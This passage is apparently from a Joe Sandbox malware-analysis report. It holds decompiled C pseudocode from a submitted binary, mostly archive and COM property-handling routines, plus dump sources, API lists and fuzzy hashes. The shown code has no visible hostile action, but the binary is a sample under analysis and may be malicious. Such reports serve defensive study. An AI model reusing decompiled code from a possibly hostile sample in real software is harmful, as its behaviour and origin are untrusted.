                              						 *(_t348 - 4) = 1;
                              						if( *(_t348 - 0x58) != _t270) {
                              							__eflags =  *(_t348 - 0x58) - 8;
                              							if( *(_t348 - 0x58) == 8) {
                              								E00401D1B(_t348 - 0x18,  *((intOrPtr*)(_t348 - 0x50)));
                              								L12:
                              								E00401D7A(_t344 + 0x1c, _t348 - 0x18);
                              								__eflags =  *((intOrPtr*)(_t348 + 0x14)) - _t270;
                              								if( *((intOrPtr*)(_t348 + 0x14)) != _t270) {
                              									 *( *(_t348 + 0x10)) = _t270;
                              									L61:
                              									E00403A9C( *(_t348 - 0x18));
                              									 *(_t348 - 4) =  *(_t348 - 4) | 0xffffffff;
                              									E00405E34(_t348 - 0x58);
                              									_t195 = 0;
                              									__eflags = 0;
                              									goto L62;
                              								}
                              								 *(_t348 - 0x28) = _t270;
                              								 *(_t348 - 0x26) = _t270;
                              								_t196 =  *((intOrPtr*)(_t344 + 0xc));
                              								 *(_t348 - 4) = 2;
                              								_t197 =  *((intOrPtr*)( *_t196 + 0x18))(_t196, _t338, 9, _t348 - 0x28);
                              								__eflags = _t197 - _t270;
                              								if(_t197 == _t270) {
                              									__eflags =  *(_t348 - 0x28) - _t270;
                              									if( *(_t348 - 0x28) != _t270) {
                              										__eflags =  *(_t348 - 0x28) - 0x13;
                              										if( *(_t348 - 0x28) == 0x13) {
                              											_t198 =  *((intOrPtr*)(_t348 - 0x20));
                              											L20:
                              											 *((intOrPtr*)(_t344 + 0x44)) = _t198;
                              											_t199 =  *((intOrPtr*)(_t344 + 0xc));
                              											_t197 =  *((intOrPtr*)( *_t199 + 0x18))(_t199, _t338, 6, _t348 - 0x28);
                              											__eflags = _t197 - _t270;
                              											if(_t197 != _t270) {
                              												goto L14;
                              											}
                              											__eflags =  *((intOrPtr*)(_t348 - 0x20)) - _t270;
                              											 *(_t348 + 0xb) = _t270;
                              											 *(_t348 - 0x74) = _t270;
                              											 *(_t348 - 0x72) = _t270;
                              											 *((char*)(_t344 + 0x40)) = _t197 & 0xffffff00 |  *((intOrPtr*)(_t348 - 0x20)) != _t270;
                              											_t204 =  *((intOrPtr*)(_t344 + 0xc));
                              											 *(_t348 - 4) = 3;
                              											_t340 =  *((intOrPtr*)( *_t204 + 0x18))(_t204, _t338, 0x15, _t348 - 0x74);
                              											__eflags = _t340 - _t270;
                              											if(_t340 == _t270) {
                              												__eflags =  *(_t348 - 0x74) - 0xb;
                              												if( *(_t348 - 0x74) == 0xb) {
                              													__eflags =  *((intOrPtr*)(_t348 - 0x6c)) - _t270;
                              													_t66 = _t348 + 0xb;
                              													 *_t66 =  *((intOrPtr*)(_t348 - 0x6c)) != _t270;
                              													__eflags =  *_t66;
                              												}
                              												 *(_t348 - 4) = 2;
                              												E00405E34(_t348 - 0x74);
                              												_t207 =  *((intOrPtr*)(_t344 + 0xc));
                              												_t197 =  *((intOrPtr*)( *_t207 + 0x18))(_t207,  *(_t348 + 0xc), 0xc, _t348 - 0x28);
                              												__eflags = _t197 - _t270;
                              												if(_t197 != _t270) {
                              													goto L14;
                              												} else {
                              													_t208 =  *(_t348 - 0x28) & 0x0000ffff;
                              													__eflags = _t208 - _t270;
                              													if(_t208 == _t270) {
                              														_t209 = _t344 + 0x38;
                              														 *(_t348 + 0xc) = _t209;
                              														 *_t209 =  *((intOrPtr*)(_t344 + 0x5c));
                              														_t289 =  *((intOrPtr*)(_t344 + 0x60));
                              														L30:
                              														 *((intOrPtr*)(_t209 + 4)) = _t289;
                              														E00402155(_t348 - 0x3c);
                              														_t341 = 0x41b370;
                              														 *((intOrPtr*)(_t348 - 0x3c)) = 0x41b370;
                              														 *(_t348 - 4) = 4;
                              														E004044BC(_t348 - 0x18, _t348 - 0x3c, __eflags);
                              														__eflags =  *((intOrPtr*)(_t348 - 0x34)) - _t270;
                              														if( *((intOrPtr*)(_t348 - 0x34)) != _t270) {
                              															E00401CE1(_t348 - 0x64, _t348 - 0x18);
                              															__eflags =  *((intOrPtr*)(_t344 + 0x40)) - _t270;
                              															 *(_t348 - 4) = 6;
                              															if( *((intOrPtr*)(_t344 + 0x40)) == _t270) {
                              																E004042DE(_t348 - 0x3c);
                              															}
                              															__eflags =  *((intOrPtr*)(_t348 - 0x34)) - _t270;
                              															if( *((intOrPtr*)(_t348 - 0x34)) != _t270) {
                              																__eflags =  *(_t348 + 0xb) - _t270;
                              																if( *(_t348 + 0xb) == _t270) {
                              																	_push(_t348 - 0x3c); // executed
                              																	E004027A6(_t344); // executed
                              																}
                              															}
                              															_t335 = _t344 + 0x10;
                              															_push(_t348 - 0x64);
                              															E00402634(_t348 - 0x48, _t344 + 0x10);
                              															__eflags =  *((intOrPtr*)(_t344 + 0x40)) - _t270;
                              															 *(_t348 - 4) = 7;
                              															if( *((intOrPtr*)(_t344 + 0x40)) == _t270) {
                              																E00402EE1(_t348 - 0x84);
                              																_push( *((intOrPtr*)(_t348 - 0x48)));
                              																 *(_t348 - 4) = 9;
                              																_t217 = E00405841(_t348 - 0xac, _t335); // executed
                              																__eflags = _t217;
                              																if(_t217 == 0) {
                              																	L48:
                              																	__eflags =  *(_t348 + 0xb) - _t270;
                              																	if( *(_t348 + 0xb) != _t270) {
                              																		L59:
                              																		E00401D7A(_t344 + 0x28, _t348 - 0x48);
                              																		E00403A9C( *((intOrPtr*)(_t348 - 0x84)));
                              																		E00403A9C( *((intOrPtr*)(_t348 - 0x48)));
                              																		E00403A9C( *((intOrPtr*)(_t348 - 0x64)));
                              																		 *((intOrPtr*)(_t348 - 0x3c)) = _t341;
                              																		 *(_t348 - 4) = 0xd;
                              																		E004042D6();
                              																		 *(_t348 - 4) = 2;
                              																		E004042AD(_t348 - 0x3c);
                              																		 *(_t348 - 4) = 1;
                              																		E00405E34(_t348 - 0x28);
                              																		goto L61;
                              																	}
                              																	_push(0x18);
                              																	_t226 = E00403A76();
                              																	__eflags = _t226 - _t270;
                              																	if(_t226 == _t270) {
                              																		_t342 = 0;
                              																		__eflags = 0;
                              																	} else {
                              																		 *(_t226 + 4) = _t270;
                              																		 *(_t226 + 8) =  *(_t226 + 8) | 0xffffffff;
                              																		 *_t226 = 0x41b354;
                              																		_t342 = _t226;
                              																	}
                              																	__eflags = _t342 - _t270;
                              																	 *(_t344 + 0x48) = _t342;
                              																	 *(_t348 + 0xc) = _t342;
                              																	if(_t342 != _t270) {
                              																		 *((intOrPtr*)( *_t342 + 4))(_t342);
                              																	}
                              																	_t227 =  *(_t344 + 0x48);
                              																	 *(_t227 + 0x10) = _t270;
                              																	 *(_t348 - 4) = 0xb;
                              																	 *(_t227 + 0x14) = _t270;
                              																	_t228 = E00405C43( *((intOrPtr*)(_t348 - 0x48)), 1);
                              																	__eflags = _t228;
                              																	if(_t228 != 0) {
                              																		E0040640D(_t344 + 0x4c, _t342);
                              																		 *(_t348 - 4) = 9;
                              																		 *( *(_t348 + 0x10)) = _t342;
                              																		_t341 = 0x41b370;
                              																		goto L59;
                              																	} else {
                              																		E00401D1B(_t344 + 0xe4,  *0x420280);
                              																		__eflags = _t342 - _t270;
                              																		 *(_t348 - 4) = 9;
                              																		if(_t342 != _t270) {
                              																			 *((intOrPtr*)( *_t342 + 8))(_t342);
                              																		}
                              																		E00403A9C( *((intOrPtr*)(_t348 - 0x84)));
                              																		E00403A9C( *((intOrPtr*)(_t348 - 0x48)));
                              																		E00403A9C( *((intOrPtr*)(_t348 - 0x64)));
                              																		 *((intOrPtr*)(_t348 - 0x3c)) = 0x41b370;
                              																		 *(_t348 - 4) = 0xc;
                              																		E004042D6();
                              																		 *(_t348 - 4) = 2;
                              																		E004042AD(_t348 - 0x3c);
                              																		 *(_t348 - 4) = 1;
                              																		E00405E34(_t348 - 0x28);
                              																		E00403A9C( *(_t348 - 0x18));
                              																		 *(_t348 - 4) =  *(_t348 - 4) | 0xffffffff;
                              																		E00405E34(_t348 - 0x58);
                              																		_t195 = 0x80004005;
                              																		goto L62;
                              																	}
                              																}
                              																_t244 = E00404BFA(_t270,  *((intOrPtr*)(_t348 - 0x48)));
                              																__eflags = _t244;
                              																if(_t244 != 0) {
                              																	goto L48;
                              																}
                              																E00401D1B(_t344 + 0xe4,  *0x42027c);
                              																E00403A9C( *((intOrPtr*)(_t348 - 0x84)));
                              																E00403A9C( *((intOrPtr*)(_t348 - 0x48)));
                              																E00403A9C( *((intOrPtr*)(_t348 - 0x64)));
                              																 *((intOrPtr*)(_t348 - 0x3c)) = _t341;
                              																 *(_t348 - 4) = 0xa;
                              																L45:
                              																_t270 = 0x80004005;
                              																goto L46;
                              															} else {
                              																_t346 = _t344 + 0x28;
                              																E00401D7A(_t346, _t348 - 0x48);
                              																__eflags =  *(_t348 + 0xb) - _t270;
                              																_t315 =  *_t346;
                              																if( *(_t348 + 0xb) == _t270) {
                              																	__eflags = 0;
                              																	E0040483F(_t315, 0, _t270,  *(_t348 + 0xc));
                              																} else {
                              																	E0040494E(_t315);
                              																}
                              																E00403A9C( *((intOrPtr*)(_t348 - 0x48)));
                              																E00403A9C( *((intOrPtr*)(_t348 - 0x64)));
                              																 *((intOrPtr*)(_t348 - 0x3c)) = _t341;
                              																 *(_t348 - 4) = 8;
                              																L46:
                              																E004042D6();
                              																 *(_t348 - 4) = 2;
                              																E004042AD(_t348 - 0x3c);
                              																L47:
                              																 *(_t348 - 4) = 1;
                              																E00405E34(_t348 - 0x28);
                              																E00403A9C( *(_t348 - 0x18));
                              																 *(_t348 - 4) =  *(_t348 - 4) | 0xffffffff;
                              																E00405E34(_t348 - 0x58);
                              																_t195 = _t270;
                              																goto L62;
                              															}
                              														}
                              														 *((intOrPtr*)(_t348 - 0x3c)) = 0x41b370;
                              														 *(_t348 - 4) = 5;
                              														goto L45;
                              													}
                              													__eflags = _t208 - 0x40;
                              													if(_t208 != 0x40) {
                              														goto L18;
                              													}
                              													_t209 = _t344 + 0x38;
                              													 *(_t348 + 0xc) = _t209;
                              													 *_t209 =  *((intOrPtr*)(_t348 - 0x20));
                              													_t289 =  *((intOrPtr*)(_t348 - 0x1c));
                              													goto L30;
                              												}
                              											}
                              											 *(_t348 - 4) = 2;
                              											E00405E34(_t348 - 0x74);
                              											 *(_t348 - 4) = 1;
                              											E00405E34(_t348 - 0x28);
                              											E00403A9C( *(_t348 - 0x18));
                              											 *(_t348 - 4) =  *(_t348 - 4) | 0xffffffff;
                              											E00405E34(_t348 - 0x58);
                              											_t195 = _t340;
                              											goto L62;
                              										}
                              										L18:
                              										_t270 = 0x80004005;
                              										goto L47;
                              									}
                              									_t198 =  *((intOrPtr*)(_t344 + 0x64));
                              									goto L20;
                              								}
                              								L14:
                              								_t270 = _t197;
                              								goto L47;
                              							}
                              							E00403A9C( *(_t348 - 0x18));
                              							_t347 = 0x80004005;
                              							goto L10;
                              						}
                              						E00401D7A(_t348 - 0x18, _t344 + 0x50);
                              						goto L12;
                              					} else {
                              						_t347 = _t187;
                              						L10:
                              						 *(_t348 - 4) =  *(_t348 - 4) | 0xffffffff;
                              						E00405E34(_t348 - 0x58);
                              						_t195 = _t347;
                              						L62:
                              						 *[fs:0x0] =  *((intOrPtr*)(_t348 - 0xc));
                              						return _t195;
                              					}
                              				}
                              				_t195 = 0x80004004;
                              				goto L62;
                              			}
































                              APIs
                              • __EH_prolog.LIBCMT ref: 00402812
                                • Part of subcall function 00402D80: EnterCriticalSection.KERNEL32(?,?,?,004095B9), ref: 00402D85
                                • Part of subcall function 00402D80: LeaveCriticalSection.KERNEL32(?,?,?,?,004095B9), ref: 00402D8F
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: CriticalSection$EnterH_prologLeave
                              • String ID:
                              • API String ID: 367238759-0
                              • Opcode ID: 71e1dc36bd9d06b7d898947adcd583decfbfe7f4f6cc64154346a2ad7b3dab8a
                              • Instruction ID: 6b86c84e82b28a82bfdc9d9b9477fa58d6923614df4f06b31c284573bb568367
                              • Opcode Fuzzy Hash: 71e1dc36bd9d06b7d898947adcd583decfbfe7f4f6cc64154346a2ad7b3dab8a
                              • Instruction Fuzzy Hash: 14F1AD30900249DFCF14EFA5C989ADEBBB4AF54318F14806EE445B72E2DB789A45CF19
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 87%
                              			E00408A3B(intOrPtr __ecx) {
                              				intOrPtr _t181;
                              				signed int _t184;
                              				signed int* _t187;
                              				intOrPtr _t188;
                              				signed int* _t191;
                              				signed int* _t193;
                              				void* _t194;
                              				signed int* _t195;
                              				void* _t197;
                              				signed int* _t198;
                              				void* _t200;
                              				signed int* _t201;
                              				intOrPtr _t205;
                              				signed int* _t207;
                              				signed int* _t208;
                              				signed int* _t209;
                              				intOrPtr* _t213;
                              				intOrPtr* _t215;
                              				intOrPtr _t216;
                              				intOrPtr* _t217;
                              				intOrPtr* _t220;
                              				signed int* _t222;
                              				signed int* _t223;
                              				signed int* _t224;
                              				intOrPtr* _t232;
                              				signed int* _t234;
                              				signed int* _t235;
                              				signed int* _t236;
                              				intOrPtr* _t243;
                              				signed int* _t245;
                              				signed int* _t246;
                              				signed int* _t247;
                              				intOrPtr _t255;
                              				signed int _t266;
                              				signed int _t307;
                              				signed int _t313;
                              				intOrPtr _t317;
                              				signed int** _t319;
                              				intOrPtr _t320;
                              				void* _t322;
                              
                              				E00413954(E00419B47, _t322);
                              				_push(_t313);
                              				 *((intOrPtr*)(_t322 - 0x20)) = __ecx;
                              				E00408A27(__ecx);
                              				if( *((intOrPtr*)( *((intOrPtr*)(_t322 + 0xc)) + 8)) < 0x20) {
                              					while(1) {
                              						_t317 =  *((intOrPtr*)(_t322 + 0xc));
                              						_t307 = 1;
                              						_t313 = _t313 | 0xffffffff;
                              						_t181 =  *((intOrPtr*)(_t317 + 8));
                              						 *(_t322 - 0x24) = _t313;
                              						if(_t181 < _t307) {
                              							goto L6;
                              						}
                              						L4:
                              						_t266 =  *( *((intOrPtr*)(_t322 - 0x20)) + 8);
                              						if(_t266 >= _t181) {
                              							L76:
                              							 *((char*)( *((intOrPtr*)(_t322 - 0x20)) + 0x30)) = _t266 & 0xffffff00 |  *( *((intOrPtr*)(_t322 - 0x20)) + 8) != 0x00000000;
                              							_t184 = 0;
                              							goto L77;
                              						}
                              						 *(_t322 - 0x24) =  *( *((intOrPtr*)(_t317 + 0xc)) + (_t181 - _t266) * 4 - 4);
                              						L7:
                              						if(_t266 != 0) {
                              							 *(_t322 - 0x38) = 0;
                              							 *((short*)(_t322 - 0x36)) = 0;
                              							_t319 =  *( *((intOrPtr*)( *((intOrPtr*)(_t322 - 0x20)) + 0xc)) + _t266 * 4 - 4);
                              							_t187 =  *_t319;
                              							 *(_t322 - 4) = _t307;
                              							_t188 =  *((intOrPtr*)( *_t187 + 0x20))(_t187, _t307, _t322 - 0x38);
                              							if(_t188 != 0) {
                              								L35:
                              								 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
                              								_t320 = _t188;
                              								E00405E34(_t322 - 0x38);
                              								L71:
                              								_t184 = _t320;
                              								goto L77;
                              							}
                              							if( *(_t322 - 0x38) != 0x13) {
                              								L75:
                              								 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
                              								_t266 = _t322 - 0x38;
                              								E00405E34(_t266);
                              								goto L76;
                              							}
                              							_t191 =  *_t319;
                              							_t313 =  *(_t322 - 0x30);
                              							_t188 =  *((intOrPtr*)( *_t191 + 0x14))(_t191, _t322 - 0x3c);
                              							if(_t188 != 0) {
                              								goto L35;
                              							}
                              							if(_t313 >=  *((intOrPtr*)(_t322 - 0x3c))) {
                              								goto L75;
                              							}
                              							 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
                              							E00405E34(_t322 - 0x38);
                              							 *(_t322 - 0x10) = 0;
                              							_t193 =  *_t319;
                              							_t266 =  *_t193;
                              							 *(_t322 - 4) = 2;
                              							_t194 =  *_t266(_t193, 0x41b228, _t322 - 0x10);
                              							_t195 =  *(_t322 - 0x10);
                              							if(_t194 != 0 || _t195 == 0) {
                              								 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
                              								goto L52;
                              							} else {
                              								 *(_t322 - 0x14) = 0;
                              								_t266 =  *_t195;
                              								 *(_t322 - 4) = 3;
                              								_t197 =  *((intOrPtr*)(_t266 + 0xc))(_t195, _t313, _t322 - 0x14);
                              								_t198 =  *(_t322 - 0x14);
                              								if(_t197 != 0 || _t198 == 0) {
                              									 *(_t322 - 4) = 2;
                              									goto L49;
                              								} else {
                              									 *(_t322 - 0x18) = 0;
                              									_t266 =  *_t198;
                              									 *(_t322 - 4) = 4;
                              									_t200 =  *_t266(_t198, 0x41b2f8, _t322 - 0x18);
                              									_t201 =  *(_t322 - 0x18);
                              									if(_t200 != 0 || _t201 == 0) {
                              										 *(_t322 - 4) = 3;
                              										goto L46;
                              									} else {
                              										E00408EA0(_t322 - 0x78);
                              										_push(_t322 - 0x74);
                              										_push(_t313);
                              										 *(_t322 - 4) = 5;
                              										_t205 = E0040836D(_t319);
                              										 *((intOrPtr*)(_t322 - 0x28)) = _t205;
                              										if(_t205 != 0) {
                              											 *(_t322 - 4) = 4;
                              											E004038C2(_t322 - 0x78);
                              											_t207 =  *(_t322 - 0x18);
                              											 *(_t322 - 4) = 3;
                              											if(_t207 != 0) {
                              												 *((intOrPtr*)( *_t207 + 8))(_t207);
                              											}
                              											_t208 =  *(_t322 - 0x14);
                              											 *(_t322 - 4) = 2;
                              											if(_t208 != 0) {
                              												 *((intOrPtr*)( *_t208 + 8))(_t208);
                              											}
                              											_t209 =  *(_t322 - 0x10);
                              											 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
                              											if(_t209 != 0) {
                              												 *((intOrPtr*)( *_t209 + 8))(_t209);
                              											}
                              											_t184 =  *((intOrPtr*)(_t322 - 0x28));
                              											goto L77;
                              										}
                              										 *((intOrPtr*)(_t322 - 0x1c)) = 0;
                              										_t213 =  *((intOrPtr*)(_t322 + 0x1c));
                              										 *(_t322 - 4) = 6;
                              										 *((intOrPtr*)( *_t213))(_t213, 0x41b218, _t322 - 0x1c);
                              										_t215 =  *((intOrPtr*)(_t322 - 0x1c));
                              										if(_t215 != 0) {
                              											 *((intOrPtr*)( *_t215 + 0xc))(_t215,  *((intOrPtr*)(_t322 - 0x74)));
                              										}
                              										 *(_t322 - 0x58) = _t313;
                              										_t216 = E00408524(_t322 - 0x78,  *((intOrPtr*)(_t322 + 8)),  *(_t322 - 0x24),  *(_t322 - 0x18), 0,  *((intOrPtr*)(_t322 + 0x1c)));
                              										 *((intOrPtr*)(_t322 - 0x28)) = _t216;
                              										if(_t216 == 1) {
                              											_t217 =  *((intOrPtr*)(_t322 - 0x1c));
                              											 *(_t322 - 4) = 5;
                              											if(_t217 != 0) {
                              												 *((intOrPtr*)( *_t217 + 8))(_t217);
                              											}
                              											_t266 = _t322 - 0x78;
                              											 *(_t322 - 4) = 4;
                              											E004038C2(_t266);
                              											_t201 =  *(_t322 - 0x18);
                              											 *(_t322 - 4) = 3;
                              											L46:
                              											if(_t201 != 0) {
                              												_t266 =  *_t201;
                              												 *((intOrPtr*)(_t266 + 8))(_t201);
                              											}
                              											_t198 =  *(_t322 - 0x14);
                              											 *(_t322 - 4) = 2;
                              											L49:
                              											if(_t198 != 0) {
                              												_t266 =  *_t198;
                              												 *((intOrPtr*)(_t266 + 8))(_t198);
                              											}
                              											 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
                              											_t195 =  *(_t322 - 0x10);
                              											L52:
                              											if(_t195 != 0) {
                              												_t266 =  *_t195;
                              												 *((intOrPtr*)(_t266 + 8))(_t195);
                              											}
                              											goto L76;
                              										} else {
                              											if(_t216 != 0) {
                              												_t220 =  *((intOrPtr*)(_t322 - 0x1c));
                              												 *(_t322 - 4) = 5;
                              												if(_t220 != 0) {
                              													 *((intOrPtr*)( *_t220 + 8))(_t220);
                              												}
                              												 *(_t322 - 4) = 4;
                              												E004038C2(_t322 - 0x78);
                              												_t222 =  *(_t322 - 0x18);
                              												 *(_t322 - 4) = 3;
                              												if(_t222 != 0) {
                              													 *((intOrPtr*)( *_t222 + 8))(_t222);
                              												}
                              												_t223 =  *(_t322 - 0x14);
                              												 *(_t322 - 4) = 2;
                              												if(_t223 != 0) {
                              													 *((intOrPtr*)( *_t223 + 8))(_t223);
                              												}
                              												_t224 =  *(_t322 - 0x10);
                              												 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
                              												if(_t224 != 0) {
                              													 *((intOrPtr*)( *_t224 + 8))(_t224);
                              												}
                              												_t184 =  *((intOrPtr*)(_t322 - 0x28));
                              												goto L77;
                              											}
                              											_push(_t322 - 0x4c);
                              											_push(_t322 - 0x54);
                              											_push(_t313);
                              											_t320 = E0040848C(_t319);
                              											if(_t320 != 0) {
                              												_t232 =  *((intOrPtr*)(_t322 - 0x1c));
                              												 *(_t322 - 4) = 5;
                              												if(_t232 != 0) {
                              													 *((intOrPtr*)( *_t232 + 8))(_t232);
                              												}
                              												 *(_t322 - 4) = 4;
                              												E004038C2(_t322 - 0x78);
                              												_t234 =  *(_t322 - 0x18);
                              												 *(_t322 - 4) = 3;
                              												if(_t234 != 0) {
                              													 *((intOrPtr*)( *_t234 + 8))(_t234);
                              												}
                              												_t235 =  *(_t322 - 0x14);
                              												 *(_t322 - 4) = 2;
                              												if(_t235 != 0) {
                              													 *((intOrPtr*)( *_t235 + 8))(_t235);
                              												}
                              												_t236 =  *(_t322 - 0x10);
                              												 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
                              												if(_t236 != 0) {
                              													 *((intOrPtr*)( *_t236 + 8))(_t236);
                              												}
                              												goto L71;
                              											}
                              											_push(_t322 - 0x78);
                              											E004093F0( *((intOrPtr*)(_t322 - 0x20)));
                              											_t243 =  *((intOrPtr*)(_t322 - 0x1c));
                              											 *(_t322 - 4) = 5;
                              											if(_t243 != 0) {
                              												 *((intOrPtr*)( *_t243 + 8))(_t243);
                              											}
                              											 *(_t322 - 4) = 4;
                              											E004038C2(_t322 - 0x78);
                              											_t245 =  *(_t322 - 0x18);
                              											 *(_t322 - 4) = 3;
                              											if(_t245 != 0) {
                              												 *((intOrPtr*)( *_t245 + 8))(_t245);
                              											}
                              											_t246 =  *(_t322 - 0x14);
                              											 *(_t322 - 4) = 2;
                              											if(_t246 != 0) {
                              												 *((intOrPtr*)( *_t246 + 8))(_t246);
                              											}
                              											_t247 =  *(_t322 - 0x10);
                              											 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
                              											if(_t247 != 0) {
                              												 *((intOrPtr*)( *_t247 + 8))(_t247);
                              											}
                              											while(1) {
                              												_t317 =  *((intOrPtr*)(_t322 + 0xc));
                              												_t307 = 1;
                              												_t313 = _t313 | 0xffffffff;
                              												_t181 =  *((intOrPtr*)(_t317 + 8));
                              												 *(_t322 - 0x24) = _t313;
                              												if(_t181 < _t307) {
                              													goto L6;
                              												}
                              												goto L4;
                              											}
                              										}
                              									}
                              								}
                              							}
                              						}
                              						E00408EA0(_t322 - 0xb4);
                              						 *(_t322 - 4) = 0;
                              						E00401D7A(_t322 - 0xb0,  *((intOrPtr*)(_t322 + 0x18)));
                              						 *(_t322 - 0x94) = _t313;
                              						_t255 = E00408902(_t322 - 0xb4,  *((intOrPtr*)(_t322 + 8)),  *(_t322 - 0x24),  *((intOrPtr*)(_t322 + 0x10)),  *((intOrPtr*)(_t322 + 0x14)),  *((intOrPtr*)(_t322 + 0x1c))); // executed
                              						_t320 = _t255;
                              						if(_t320 != 0) {
                              							 *(_t322 - 4) = _t313;
                              							E004038C2(_t322 - 0xb4);
                              							goto L71;
                              						}
                              						_push(_t322 - 0xb4);
                              						E004093F0( *((intOrPtr*)(_t322 - 0x20)));
                              						 *(_t322 - 4) = _t313;
                              						E004038C2(_t322 - 0xb4);
                              						continue;
                              						L6:
                              						_t266 =  *( *((intOrPtr*)(_t322 - 0x20)) + 8);
                              						if(_t266 >= 0x20) {
                              							goto L76;
                              						}
                              						goto L7;
                              					}
                              				} else {
                              					_t184 = 0x80004001;
                              					L77:
                              					 *[fs:0x0] =  *((intOrPtr*)(_t322 - 0xc));
                              					return _t184;
                              				}
                              			}

                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 463f0c4feddd306d7c1a8d70083033d754a2b3fae2b1194d3c8a033132b27601
                              • Instruction ID: 34c7193a5b50bb33ce0ba2a09d23f7b106f418ab12413814a78bbf0ce5505d58
                              • Opcode Fuzzy Hash: 463f0c4feddd306d7c1a8d70083033d754a2b3fae2b1194d3c8a033132b27601
                              • Instruction Fuzzy Hash: 62E17F70A00249DFCF10DFA4C988AAEBBB4AF58314F2445AEE495F72D1CB389E45CB55
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 91%
                              			E0040EA0B(intOrPtr* __ecx, signed int __edx, void* __eflags) {
                              				intOrPtr _t191;
                              				intOrPtr* _t197;
                              				intOrPtr _t202;
                              				void* _t220;
                              				void* _t227;
                              				intOrPtr _t267;
                              				signed int _t271;
                              				intOrPtr* _t273;
                              				intOrPtr* _t277;
                              				intOrPtr* _t279;
                              				intOrPtr* _t283;
                              				void* _t284;
                              				void* _t289;
                              
                              				_t289 = __eflags;
                              				_t271 = __edx;
                              				E00413954(E0041A72D, _t284);
                              				_t273 = __ecx;
                              				E004032A8(_t284 - 0x5c, 8);
                              				 *((intOrPtr*)(_t284 - 0x5c)) = 0x41b694;
                              				 *(_t284 - 4) =  *(_t284 - 4) & 0x00000000;
                              				E004032A8(_t284 - 0xd8, 1);
                              				 *((intOrPtr*)(_t284 - 0xd8)) = 0x41b748;
                              				E004032A8(_t284 - 0xc4, 4);
                              				 *((intOrPtr*)(_t284 - 0xc4)) = 0x41b684;
                              				 *(_t284 - 4) = 2;
                              				E00402155(_t284 - 0x30);
                              				 *((intOrPtr*)(_t284 - 0x30)) = 0x41b7f8;
                              				E004032A8(_t284 - 0x84, 4);
                              				 *((intOrPtr*)(_t284 - 0x84)) = 0x41b684;
                              				E004032A8(_t284 - 0x9c, 8);
                              				 *((intOrPtr*)(_t284 - 0x9c)) = 0x41b694;
                              				E004032A8(_t284 - 0xb0, 1);
                              				 *((intOrPtr*)(_t284 - 0xb0)) = 0x41b748;
                              				E004032A8(_t284 - 0x70, 4);
                              				 *((intOrPtr*)(_t284 - 0x70)) = 0x41b684;
                              				_t277 =  *((intOrPtr*)(_t284 + 0x10));
                              				 *(_t284 - 4) = 7;
                              				E0040E86B(__ecx, __edx, 0, _t277, _t284 - 0x5c, _t284 - 0xd8, _t284 - 0xc4, _t284 - 0x30, _t284 - 0x84, _t284 - 0x9c, _t284 - 0xb0, _t284 - 0x70);
                              				 *(_t284 - 0x14) =  *(_t284 - 0x14) & 0x00000000;
                              				E0040AC6A(_t284 - 0x164, _t289, 1);
                              				_t227 =  *_t277 +  *((intOrPtr*)(_t284 + 8));
                              				asm("adc esi, [ebp+0xc]");
                              				 *(_t284 + 0xc) =  *(_t284 + 0xc) & 0x00000000;
                              				 *((intOrPtr*)(_t284 - 0x34)) =  *((intOrPtr*)(_t277 + 4));
                              				if( *((intOrPtr*)(_t284 - 0x28)) <= 0) {
                              					L17:
                              					 *(_t284 - 4) = 7;
                              					E0040C380(_t284 - 0x164, _t301); // executed
                              					 *(_t284 - 4) = 6;
                              					E004042AD(_t284 - 0x70);
                              					 *(_t284 - 4) = 5;
                              					E004042AD(_t284 - 0xb0);
                              					 *(_t284 - 4) = 4;
                              					E004042AD(_t284 - 0x9c);
                              					 *(_t284 - 4) = 3;
                              					E004042AD(_t284 - 0x84);
                              					 *((intOrPtr*)(_t284 - 0x30)) = 0x41b7f8;
                              					 *(_t284 - 4) = 0xc;
                              					_t279 = 0;
                              					L18:
                              					E004042D6();
                              					 *(_t284 - 4) = 2;
                              					E004042AD(_t284 - 0x30);
                              					 *(_t284 - 4) = 1;
                              					E004042AD(_t284 - 0xc4);
                              					 *(_t284 - 4) =  *(_t284 - 4) & 0x00000000;
                              					E004042AD(_t284 - 0xd8);
                              					 *(_t284 - 4) =  *(_t284 - 4) | 0xffffffff;
